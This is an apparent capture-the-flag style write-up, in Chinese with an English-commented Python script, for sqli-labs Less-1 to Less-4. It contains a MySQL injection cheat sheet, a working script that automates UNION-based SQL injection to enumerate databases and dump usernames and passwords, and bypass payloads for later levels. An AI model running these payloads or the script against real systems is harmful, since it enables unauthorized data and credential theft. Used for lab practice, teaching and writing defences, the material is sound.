version() Mysql版本
user() 数据库用户名
database() 数据库名
@@datadir 数据库安装路径
@@version_compile_os 操作系统版本
select schema_name from information_schema.schemata
select table_name from information_schema.tables where table_schema='security' -- 该表名用的时候大多转为16进制
select column_name from information_schema.columns where table_name='users'
select username,password from security.users
order by (n)
#
--+
--
concat (str1 , str2) -- 连接字符串, 无分隔符
concat (-/~ , str1 , str2) -- 连接字符串, 有分隔符
group_concat (str1 , str2) -- 连接字符串, 并用 ',' 分隔每一个字符
(如题)
首先用id=1'发现报错, 再用id=1' or '1'='1发现成功注入, 判断为字符型注入
写了个脚本, 一把梭
# coding=utf-8
"""Walkthrough script for sqli-labs Less-1: enumerate the database through the ``id`` parameter.

Every request is a GET against ``url`` with a hand-built query string.  The lab
page reflects the result of its lookup as the text ``Your Login name:`` /
``Your Password:``, and all of the helpers below read their answer out of that
reflected text (see ``PrintNameAndPswd``).  Results are written to
``sqli-lab1.txt`` by the ``__main__`` block.

What makes this work, from the defender's side, is visible in the payloads:
the ``id`` value is concatenated into the SQL statement (the ``'`` closes the
literal), the original query is cut off with ``--+``, and whatever the
``UNION`` selects is echoed verbatim to the client.  Parameterized queries
remove the first condition; not echoing raw query results removes the third.
Requests whose numeric ``id`` parameter carries ``union select``,
``information_schema`` or ``group_concat`` are the straightforward detection
signal for this traffic.
"""
import requests
from urllib import parse          # only used in commented-out debug prints below
import sys                        # unused
from bs4 import BeautifulSoup     # unused

# Lab endpoint; every helper sends GET url?<payload>.
url = "http://www.sqlstudy.com/sqlstudy/Less-1"


def CheckStatus(r_text: str) -> int:
    """Return 1 if the page shows the reflected login-name marker, else 0.

    The marker is present only when the injected statement executed and
    produced a row, so this doubles as the "did the payload work" oracle.
    """
    if "Login name" in r_text:
        return 1
    else:
        return 0


def PrintNameAndPswd(res_text: str) -> str:
    """Extract the reflected name fragment from the page text.

    Scans from ``Your Login name:`` (and, separately, ``Your Password:``)
    forward to the next ``<``.  Despite the name it prints nothing; it returns
    the name fragment *including* the ``Your Login name:`` prefix, which every
    caller strips by slicing after the first ``:``.  ``str_pswd`` is computed
    but never returned.  Raises ``ValueError`` (from ``str.index``) if either
    marker is missing; callers only gate on ``CheckStatus``, which tests the
    first marker alone.
    """
    pos_name = res_text.index("Your Login name:")
    pos_name_move = pos_name
    pos_pswd = res_text.index("Your Password:", pos_name)
    pos_pswd_move = pos_pswd
    str_name = ''
    str_pswd = ''
    while res_text[pos_name_move] != '<':
        pos_name_move += 1
    str_name = res_text[pos_name : pos_name_move]
    while res_text[pos_pswd_move] != '<':
        pos_pswd_move += 1
    str_pswd = res_text[pos_pswd : pos_pswd_move]
    # print (str_name + '\n' + str_pswd)
    return str_name


def GetColumnsNum() -> int:
    """Binary-search the column count of the original query via ``ORDER BY n``.

    ``ORDER BY n`` succeeds (marker present) while n is at most the column
    count and fails beyond it, so the search converges on the largest n that
    rendered.  The search space is capped at 20; if even ``ORDER BY 1`` fails
    the result is 0.  One request per probe.
    """
    left = 1
    right = 20
    mid = (left + right) // 2
    while left <= right:
        payload = "id=1' order by {}--+".format(mid)
        res = requests.get(url = url , params = payload)
        # print(parse.unquote(res.url))
        res_text = res.text
        if CheckStatus(res_text):
            # PrintNameAndPswd(res_text , pos_name , pos_pswd)
            left = mid + 1
        else:
            right = mid - 1
        mid = (right + left) // 2
    return mid


def HowItContrl(columnsnum: int) -> None:
    """Probe which UNION column positions are reflected into the page.

    Builds ``union select 1,2,...,columnsnum`` so the echoed digits reveal
    the reflected positions.  Because ``PrintNameAndPswd`` no longer prints,
    this function has no observable effect and is left commented out in
    ``__main__``; the two comments below record the author's finding for this
    lab (position 2 lands in the name slot, position 3 in the password slot),
    which is why the later payloads put their data in column 2.
    """
    # Your Login name:2
    # Your Password:3
    payload = "id=-1' union select "
    for i in range(1 , columnsnum + 1):
        payload = payload + "{},".format(i)
    res = requests.get(url=url , params=payload.strip(",") + '--+')
    res_text = res.text
    if CheckStatus(res_text):
        PrintNameAndPswd(res_text)


def GetAllDatabase():
    """Return the raw reflected fragment listing all schema names, or None.

    The fragment still carries the ``Your Login name:`` prefix and the
    schema names are comma-joined by ``group_concat``; ``__main__`` does the
    splitting.  Returns None implicitly when the marker is absent.
    """
    payload = "id=-1' union select 1,(select group_concat(schema_name) from information_schema.schemata),3 --+"
    res = requests.get(url=url, params=payload)
    # print(parse.unquote(res.url))
    res_text = res.text
    if (CheckStatus(res_text)):
        return PrintNameAndPswd(res_text)


def WhereAmI():
    """Return the name of the database the lab's query runs in, or None.

    Uses ``database()``; the prefix up to the first ``:`` is stripped here.
    """
    payload = "id=-1' union select 1,database(),3 --+"
    res = requests.get(url=url, params=payload)
    # print(parse.unquote(res.url))
    res_text = res.text
    if (CheckStatus(res_text)):
        MyPosition = PrintNameAndPswd(res_text)
        return MyPosition[MyPosition.index(":") + 1 : ]


def GetTableName(DatabaseName: str):
    """Return the list of table names in ``DatabaseName``, or None.

    ``DatabaseName`` comes from the server's own earlier answer and is
    interpolated into the query inside double quotes.  Returns None
    implicitly when the marker is absent; ``__main__`` does not handle that
    case for this function (``len(None)`` would raise ``TypeError``).
    """
    payload = "id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=\"{}\"--+".format(DatabaseName)
    res = requests.get(url=url, params=payload)
    # print(parse.unquote(res.url))
    res_text = res.text
    if (CheckStatus(res_text)):
        TableName = PrintNameAndPswd(res_text)
        TableName = TableName[TableName.index(":") + 1 :].split(",")
        return TableName


def GetColumnName(TableName: str):
    """Return the list of column names for ``TableName``, or None.

    Note the lookup filters on ``table_name`` only, not on the schema, so a
    table name that exists in several schemas yields the union of their
    columns.  Same implicit-None caveat as ``GetTableName``.
    """
    payload = "id=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='{}' --+".format(TableName)
    res = requests.get(url=url, params=payload)
    # print(parse.unquote(res.url))
    res_text = res.text
    if (CheckStatus(res_text)):
        ColumnName = PrintNameAndPswd(res_text)
        ColumnName = ColumnName[ColumnName.index(":") + 1 :].split(",")
        return ColumnName


def GetDetails(DatabaseName: str , TableName: str , ColumnName: str):
    """Return the comma-split values of one column of ``DatabaseName.TableName``, or None.

    All three names are placed in identifier positions without quoting.
    ``__main__`` is the only caller and is the only place that checks for the
    None result.  A value that itself contains a comma is split apart by the
    ``split(",")`` here.
    """
    payload = "id=-1' union select 1,group_concat({}),3 from {}.{} --+".format(ColumnName , DatabaseName , TableName)
    res = requests.get(url=url, params=payload)
    # print(parse.unquote(res.url))
    res_text = res.text
    if (CheckStatus(res_text)):
        Details = PrintNameAndPswd(res_text)
        Details = Details[Details.index(":") + 1 :].split(",")
        return Details


if __name__ == "__main__" :
    # Walk schema -> table -> column -> values and write an indented report
    # to sqli-lab1.txt.  Only the innermost (GetDetails) lookup is guarded
    # against a None result; a None from GetAllDatabase / GetTableName /
    # GetColumnName propagates as an exception.
    with open('sqli-lab1.txt' , 'w') as f:
        columnsnum = GetColumnsNum()
        f.write("column_number = " + str(columnsnum) + '\n')
        # HowItContrl(columnsnum)
        DatabaseName = GetAllDatabase()
        # Strip the "Your Login name:" prefix, then split the group_concat list.
        DatabaseName = DatabaseName[DatabaseName.index(":") + 1:].split(",")
        MyPosition = WhereAmI()
        f.write("You are in : " + MyPosition + '\n')
        for i in range(0,len(DatabaseName)):
            f.write("DatabaseName : " + DatabaseName[i] + '\n')
            TableName = []
            TableName = GetTableName(DatabaseName[i])
            # print(TableName)
            for j in range(0,len(TableName)):
                f.write("--TableName : " + TableName[j] + '\n')
                ColumnName = []
                ColumnName = GetColumnName(TableName[j])
                # print(ColumnName)
                for k in range(0, len(ColumnName)):
                    f.write("----ColumnName : " + ColumnName[k] + '\n')
                    Details = []
                    Details = GetDetails(DatabaseName[i] , TableName[j] , ColumnName[k])
                    # print(type(Details))
                    # None check done by string-matching the type name.
                    Details_type = str(type(Details))
                    if not "NoneType" in Details_type:
                        for l in range(0,len(Details)):
                            f.write("------Details : " + Details[l] + '\n')
                            # Separator after the last value of a column.
                            if l == len(Details) - 1:
                                f.write("\n---------------------------------------------------------------\n\n")
                    else:
                        f.write("--------Details : NULL \n")
发现是数字型, 用id=-1 or 1=1--+就能绕过, 然后脚本改改也能一把梭
使用id=1'之后发现报错, 结合错误语句看出是('id'), 用id=-1') or 1=1--+就能绕过, 然后改脚本一把梭
id=1'没报错, 换成id=1"报错, 结合语句判断出是("id"), 用id=-1") or 1=1--+即可绕过, 改脚本梭哈